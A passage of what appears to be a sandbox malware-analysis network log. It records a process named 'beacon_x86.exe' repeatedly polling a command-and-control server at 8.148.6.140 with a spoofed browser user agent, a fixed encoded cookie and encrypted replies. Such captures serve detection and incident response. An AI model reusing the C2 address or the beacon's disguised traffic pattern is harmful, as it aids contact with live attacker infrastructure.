        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:22.463193893 CET505INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:22 GMT
        Server: nginx
        Content-Length: 320
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 35 33 36 35 71 4d 63 6e 5a 65 6f 43 53 72 37 6e 51 47 37 5a 72 63 49 58 62 78 41 31 52 6b 4c 74 33 65 51 41 31 52 6a 38 62 76 7a 6f 33 4f 53 39 50 35 7a 68 31 61 49 41 4b 7a 34 58 48 32 6a 4b 39 2f 62 70 66 77 52 38 49 6e 6f 6c 6a 4d 35 6c 76 31 36 45 4e 31 75 36 55 38 6d 43 6a 55 78 50 7a 44 6d 42 70 67 30 54 72 76 50 6f 73 56 57 4d 48 69 36 48 2b 49 74 59 7a 42 6a 48 6f 52 48 6e 54 55 70 6a 66 6c 61 35 76 39 39 79 6f 6a 49 36 78 55 32 54 4f 36 65 4f 76 41 74 52 74 71 4c 7a 71 46 39 4a 36 32 79 7a 64 61 76 59 52 55 39 5a 53 47 59 32 4e 6e 63 34 4d 68 42 62 47 73 75 6b 4b 68 41 2f 6a 51 6c 6e 74 67 6d 73 56 66 32 74 35 6f 6a 41 64 52 49 55 38 4b 5a 70 6b 6e 32 42 2b 76 61 56 33 58 57 57 65 38 6e 66 55 56 57 49 47 2b 37 49 59 61 57 56 79 76 64 70 58 75 4c 76 5a 37 79 6c 32 2f 68 77 67 4e 42 38 2b 66 69 4d 50 59 38 54 61 35 59 5a 78 76 77 65 64 37 72 30 78 4d 4c 63 41 71 4d 6d 62 6b 4f 73 76 61 48 39 54 66 54 54 64 4d 59 4e 47 72 42 74 37 79 42 69
        Data Ascii: 5365qMcnZeoCSr7nQG7ZrcIXbxA1RkLt3eQA1Rj8bvzo3OS9P5zh1aIAKz4XH2jK9/bpfwR8InoljM5lv16EN1u6U8mCjUxPzDmBpg0TrvPosVWMHi6H+ItYzBjHoRHnTUpjfla5v99yojI6xU2TO6eOvAtRtqLzqF9J62yzdavYRU9ZSGY2Nnc4MhBbGsukKhA/jQlntgmsVf2t5ojAdRIU8KZpkn2B+vaV3XWWe8nfUVWIG+7IYaWVyvdpXuLvZ7yl2/hwgNB8+fiMPY8Ta5YZxvwed7r0xMLcAqMmbkOsvaH9TfTTdMYNGrBt7yBi


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        108192.168.2.8498188.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:22.577879906 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:23.562367916 CET185INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:23 GMT
        Server: nginx
        Content-Length: 344
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Jan 10, 2025 09:29:23.562550068 CET344INData Raw: 63 4b 71 37 6b 4b 4d 69 4d 7a 69 6c 79 37 75 41 74 30 54 4b 4d 6e 35 6f 7a 61 5a 7a 47 6b 74 53 2b 73 45 72 77 43 31 75 4e 59 45 61 68 66 6a 2f 46 54 57 59 45 37 64 62 58 4a 41 66 73 62 4a 54 4b 67 6c 52 56 79 4e 64 2f 4b 76 64 6b 62 57 74 6d 46
        Data Ascii: cKq7kKMiMzily7uAt0TKMn5ozaZzGktS+sErwC1uNYEahfj/FTWYE7dbXJAfsbJTKglRVyNd/KvdkbWtmFTJapPQ7f0U8W2Z6OHwoD+0rcKGrN/ReYYLnwPgm+Db9xEdbxxnQlyozFmdELs231UCQLJnDjlejI8Ze/aYLga56eVsJ2wq8bLKw1qO4Ny/c6ZxnSONf4UsI9yYwwRH6Vz72CjtLDFsDSXe2NoZxsPix+LFkA+e+XI


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        109192.168.2.8498198.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:23.690064907 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:24.631443977 CET465INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:24 GMT
        Server: nginx
        Content-Length: 280
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 38 76 6c 6b 67 31 56 65 78 53 4a 44 49 2f 51 4f 58 74 36 35 76 65 35 47 65 4b 57 35 36 79 53 68 54 48 43 30 44 4a 70 47 74 75 37 48 49 73 4a 71 43 5a 2f 74 61 4b 6e 70 38 5a 50 69 6e 55 48 72 73 47 63 38 56 76 6b 5a 4f 50 62 4b 67 65 4d 58 4e 6f 45 2b 44 52 4c 6c 48 41 46 51 64 2b 63 38 66 33 77 2b 47 53 78 77 67 70 67 76 53 70 74 34 37 79 59 39 6c 6c 52 6b 37 56 70 6d 7a 56 72 35 48 76 70 64 57 6d 54 6b 74 63 36 54 6f 69 4a 6e 68 6d 59 31 57 35 53 49 4c 77 42 47 73 44 76 6f 53 54 7a 67 51 2b 7a 78 70 48 6c 63 6e 54 74 32 73 72 62 5a 5a 53 32 37 57 4f 5a 66 39 5a 4c 59 79 74 53 73 4a 4d 6f 4f 38 48 43 6d 42 57 2f 56 75 6a 38 67 4e 48 79 46 72 66 4b 7a 4a 56 68 77 6f 44 74 78 75 2b 32 4b 51 2b 46 52 44 43 68 2b 57 72 41 52 57 42 56 36 67 6f 69 56 4d 46 38 63 6f 52 7a 7a 70 52 39 58 74 32 30 46 34 2b 4e 6f 72 52 63 78 76 51 3d 3d
        Data Ascii: 8vlkg1VexSJDI/QOXt65ve5GeKW56yShTHC0DJpGtu7HIsJqCZ/taKnp8ZPinUHrsGc8VvkZOPbKgeMXNoE+DRLlHAFQd+c8f3w+GSxwgpgvSpt47yY9llRk7VpmzVr5HvpdWmTktc6ToiJnhmY1W5SILwBGsDvoSTzgQ+zxpHlcnTt2srbZZS27WOZf9ZLYytSsJMoO8HCmBW/Vuj8gNHyFrfKzJVhwoDtxu+2KQ+FRDCh+WrARWBV6goiVMF8coRzzpR9Xt20F4+NorRcxvQ==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        110192.168.2.8498208.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:24.749212980 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:25.726171017 CET313INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:25 GMT
        Server: nginx
        Content-Length: 128
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 4b 4d 64 45 78 57 62 4a 44 51 7a 47 6b 42 6a 4d 58 39 42 31 30 53 51 31 68 48 53 49 6f 73 70 45 4d 31 44 4f 6c 48 31 61 39 48 6f 56 45 71 42 4f 69 44 4e 68 59 6a 4c 75 45 48 39 61 41 54 6b 69 36 6e 74 52 36 4b 67 67 6f 66 48 51 74 79 51 34 7a 6a 33 67 58 55 30 74 71 48 59 31 58 73 65 6c 53 4c 4e 72 33 44 50 37 6c 31 35 59 61 55 2f 30 68 69 5a 49 45 6b 73 49 4b 53 4e 75 71 5a 54 50
        Data Ascii: KMdExWbJDQzGkBjMX9B10SQ1hHSIospEM1DOlH1a9HoVEqBOiDNhYjLuEH9aATki6ntR6KggofHQtyQ4zj3gXU0tqHY1XselSLNr3DP7l15YaU/0hiZIEksIKSNuqZTP


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        111192.168.2.8498218.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:25.958554983 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:26.908431053 CET505INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:26 GMT
        Server: nginx
        Content-Length: 320
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 4d 51 47 49 73 79 62 70 4d 43 78 61 51 79 79 33 58 4a 6d 56 72 72 41 6d 35 44 68 72 4f 53 52 4b 38 39 37 63 44 2b 76 35 71 4e 6d 67 67 48 78 6f 59 75 37 4e 4b 33 55 59 73 6a 7a 46 68 32 41 72 5a 2b 48 62 2f 78 62 4e 56 38 2b 48 79 69 6e 70 62 50 62 53 61 48 56 7a 39 70 45 41 79 54 63 6e 53 42 2b 2b 46 47 39 4e 69 66 2b 2b 6a 6f 4f 66 64 58 58 61 6e 73 78 75 77 53 33 78 7a 65 65 6a 4e 6a 30 75 52 77 75 47 49 64 32 6c 34 74 36 6e 76 6c 75 42 52 2b 4f 74 51 58 73 75 67 6f 32 69 7a 35 7a 55 71 78 76 72 4e 6b 41 6f 55 50 2f 33 37 65 45 2f 42 41 49 4d 34 45 72 52 34 75 56 38 6d 4c 4e 61 78 41 36 4e 70 30 72 4a 4d 46 5a 6c 48 31 62 78 75 53 53 30 58 79 70 4b 64 68 6f 74 30 5a 48 31 51 32 65 52 79 48 68 63 46 44 4c 58 70 64 42 65 39 63 33 39 39 32 6b 62 51 39 47 78 36 48 70 54 53 64 54 64 37 71 76 7a 57 63 53 78 44 55 45 36 34 75 75 42 48 48 5a 4a 34 4d 36 33 66 69 68 75 71 39 71 44 79 69 42 62 49 41 42 31 59 6d 62 33 45 4b 7a 53 35 62 69 72 57 45 44 35
        Data Ascii: MQGIsybpMCxaQyy3XJmVrrAm5DhrOSRK897cD+v5qNmggHxoYu7NK3UYsjzFh2ArZ+Hb/xbNV8+HyinpbPbSaHVz9pEAyTcnSB++FG9Nif++joOfdXXansxuwS3xzeejNj0uRwuGId2l4t6nvluBR+OtQXsugo2iz5zUqxvrNkAoUP/37eE/BAIM4ErR4uV8mLNaxA6Np0rJMFZlH1bxuSS0XypKdhot0ZH1Q2eRyHhcFDLXpdBe9c3992kbQ9Gx6HpTSdTd7qvzWcSxDUE64uuBHHZJ4M63fihuq9qDyiBbIAB1Ymb3EKzS5birWED5


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        112192.168.2.8498228.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:27.031115055 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        113192.168.2.8498238.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:31.155375004 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:32.129740953 CET549INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:31 GMT
        Server: nginx
        Content-Length: 364
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 57 4c 36 78 70 54 74 50 30 2f 59 34 2f 68 2b 46 46 35 47 73 6f 53 66 4e 6c 53 48 70 30 49 65 6f 4a 77 41 74 42 57 6e 36 58 31 6b 69 4d 6d 61 67 35 2b 67 44 45 77 56 6c 65 39 65 66 4b 49 54 47 32 73 71 77 41 6c 72 7a 6d 67 34 6f 35 65 6b 4e 55 53 78 4d 61 33 70 2b 73 53 56 64 6f 71 6d 65 4f 77 57 72 4a 35 6d 68 62 33 64 2b 4b 5a 36 31 79 6d 4d 77 4b 35 4d 46 67 51 50 48 72 77 6a 62 75 74 6d 61 46 6a 7a 59 43 50 37 39 2b 55 67 33 6f 70 2f 53 56 62 4c 61 6b 4a 43 37 59 76 34 5a 54 75 4f 78 70 38 55 38 6a 61 6a 39 58 58 43 6e 6d 73 72 2b 58 35 45 4b 62 55 4f 69 77 30 61 4f 42 62 4f 69 4a 51 39 63 37 71 75 73 6b 6e 2f 47 36 76 49 6e 4a 72 6f 44 6b 73 43 76 77 77 41 38 4f 72 75 7a 53 50 6d 51 63 78 57 33 71 4e 39 44 41 4b 76 4a 53 32 59 2b 6c 4d 61 41 75 62 36 69 64 41 48 73 41 4c 48 63 70 71 64 63 69 57 66 74 4d 64 74 69 6f 68 4a 73 47 56 33 71 77 45 44 48 69 4a 33 4a 4a 43 36 53 49 2b 59 63 52 68 58 62 62 63 4c 4e 46 4b 4f 59 56 74 34 75 43 6f 51 30 48 32 38 2b 66 65 4e 66 33 42 78 45 6a 66 66 49 59 45 [TRUNCATED]
        Data Ascii: WL6xpTtP0/Y4/h+FF5GsoSfNlSHp0IeoJwAtBWn6X1kiMmag5+gDEwVle9efKITG2sqwAlrzmg4o5ekNUSxMa3p+sSVdoqmeOwWrJ5mhb3d+KZ61ymMwK5MFgQPHrwjbutmaFjzYCP79+Ug3op/SVbLakJC7Yv4ZTuOxp8U8jaj9XXCnmsr+X5EKbUOiw0aOBbOiJQ9c7quskn/G6vInJroDksCvwwA8OruzSPmQcxW3qN9DAKvJS2Y+lMaAub6idAHsALHcpqdciWftMdtiohJsGV3qwEDHiJ3JJC6SI+YcRhXbbcLNFKOYVt4uCoQ0H28+feNf3BxEjffIYEkomBcPVvxtRuHLV8x+7XSH8nc=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        114192.168.2.8498248.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:32.280879974 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:33.879856110 CET272INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:33 GMT
        Server: nginx
        Content-Length: 88
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 78 50 70 68 52 48 7a 63 45 33 57 79 63 76 41 50 73 78 77 45 37 73 74 51 5a 65 5a 35 52 49 6d 37 4a 4c 34 4b 76 42 6f 6f 5a 74 52 62 6b 37 59 70 35 7a 66 79 65 71 73 33 4f 4c 71 7a 6e 6c 52 6c 54 78 45 69 33 7a 55 48 68 69 2b 39 4a 74 6c 7a 7a 37 30 35 64 51 3d 3d
        Data Ascii: xPphRHzcE3WycvAPsxwE7stQZeZ5RIm7JL4KvBooZtRbk7Yp5zfyeqs3OLqznlRlTxEi3zUHhi+9Jtlzz705dQ==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        115192.168.2.8498258.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:34.003082991 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:34.967295885 CET185INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:34 GMT
        Server: nginx
        Content-Length: 300
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Jan 10, 2025 09:29:34.967389107 CET300INData Raw: 35 31 33 6b 7a 78 71 63 48 34 47 38 61 44 4d 7a 36 50 5a 52 42 69 6a 6e 34 61 4c 61 67 51 55 75 43 62 54 4b 74 67 69 39 6b 53 43 4a 78 6c 4f 49 74 4b 6f 58 49 39 33 59 61 76 5a 64 30 78 51 42 4e 70 36 53 76 6f 4c 35 4d 35 6b 48 33 75 70 63 30 63
        Data Ascii: 513kzxqcH4G8aDMz6PZRBijn4aLagQUuCbTKtgi9kSCJxlOItKoXI93YavZd0xQBNp6SvoL5M5kH3upc0cPR7WVmmkwyCrNIBf6JyoKMis2RkAdxBq7fqGq2RttJPTet7zxwuIML7WaI5eeeaL/XXXSttYLikBLAep568dW0CNoRnwvUPSaL/hN+QJhmbFYosEIMS/UbywmdvkKLAvuKc4pyOsiQdNpfBTDdl5LEXceOTHRfXhS


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        116192.168.2.8498268.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:35.142998934 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:39.144649029 CET313INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:38 GMT
        Server: nginx
        Content-Length: 128
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 42 39 6e 48 76 48 32 44 73 59 37 49 4b 51 53 2b 4b 33 63 78 6c 2b 7a 66 42 70 32 5a 72 32 78 68 73 2b 4a 70 62 35 44 65 4c 53 55 66 56 6e 42 48 30 6a 52 37 59 47 75 4a 72 49 72 72 42 33 37 50 6b 37 74 74 41 4d 36 30 5a 67 48 45 4d 33 4e 61 75 4c 6a 57 37 57 35 32 47 59 37 31 45 66 4e 33 4d 6f 6f 53 39 66 33 39 70 51 6b 50 2f 43 6a 68 73 6c 54 37 7a 2b 4c 4b 59 59 6e 52 4c 4f 6c 47
        Data Ascii: B9nHvH2DsY7IKQS+K3cxl+zfBp2Zr2xhs+Jpb5DeLSUfVnBH0jR7YGuJrIrrB37Pk7ttAM60ZgHEM3NauLjW7W52GY71EfN3MooS9f39pQkP/CjhslT7z+LKYYnRLOlG


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        117192.168.2.8498278.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:39.269295931 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:40.236238003 CET441INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:40 GMT
        Server: nginx
        Content-Length: 256
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 77 51 6c 76 44 33 4b 39 67 78 73 50 49 4b 64 7a 56 32 36 51 52 6a 6e 78 6f 4d 39 79 49 56 64 6f 41 45 34 4a 39 70 76 5a 66 4e 39 6f 61 62 64 63 4e 76 4a 6c 76 56 6f 6b 75 72 6f 71 48 63 4d 6c 66 35 54 72 62 63 42 65 73 70 78 75 43 31 32 41 35 4c 32 34 54 58 50 69 48 4b 53 54 37 76 61 57 57 6b 43 41 6e 59 57 6d 70 42 42 6f 41 5a 59 57 34 36 45 44 49 59 53 51 48 61 59 58 39 53 58 72 68 43 57 33 73 35 79 45 75 4e 78 43 2f 6d 35 45 57 69 44 55 73 72 48 48 62 48 31 63 34 4c 77 69 73 76 65 34 77 4d 5a 33 2b 47 47 47 62 6b 5a 74 6e 69 66 6a 4f 2f 4e 44 76 70 6a 6c 6e 39 78 4a 62 2b 52 32 71 54 64 74 72 6c 44 70 49 51 38 57 46 43 72 2f 4a 56 63 77 34 51 57 53 39 77 57 52 6c 2b 4f 63 56 79 51 5a 68 33 42 67 51 4a 4c 35 6a 74 53 2b 53 4c 4c 47 33 30 64 6d 6f 75 46 51
        Data Ascii: wQlvD3K9gxsPIKdzV26QRjnxoM9yIVdoAE4J9pvZfN9oabdcNvJlvVokuroqHcMlf5TrbcBespxuC12A5L24TXPiHKST7vaWWkCAnYWmpBBoAZYW46EDIYSQHaYX9SXrhCW3s5yEuNxC/m5EWiDUsrHHbH1c4Lwisve4wMZ3+GGGbkZtnifjO/NDvpjln9xJb+R2qTdtrlDpIQ8WFCr/JVcw4QWS9wWRl+OcVyQZh3BgQJL5jtS+SLLG30dmouFQ


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        118192.168.2.8498288.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:40.359179020 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:41.986717939 CET185INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:41 GMT
        Server: nginx
        Content-Length: 320
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Jan 10, 2025 09:29:41.986922026 CET320INData Raw: 70 4e 72 4d 61 62 6f 65 76 2f 75 6d 66 58 33 56 5a 66 72 4a 7a 2b 56 64 65 34 35 6e 48 4a 43 5a 76 62 41 75 4e 35 66 31 70 69 59 4a 6a 4a 66 58 77 52 52 73 45 48 66 63 50 6c 57 66 71 63 4d 6e 73 70 6e 47 5a 4b 55 39 39 50 65 79 56 66 67 61 75 68
        Data Ascii: pNrMaboev/umfX3VZfrJz+Vde45nHJCZvbAuN5f1piYJjJfXwRRsEHfcPlWfqcMnspnGZKU99PeyVfgauhv7wNW/7zx3LJCD4pf267dH1RbqxBlbOmUt5weEG9bovFoF7HdE24tsuh3vkeVJbNFMSbu/IFqvJVowllQjnLhKVRB5alxMlsaWuZf4mhfa1EGhgGeDnV05tDB7+Xq6ZCZu2W3hks796Tvytrae47ASOyLENztJ5zm


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        119192.168.2.8498298.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:42.108176947 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
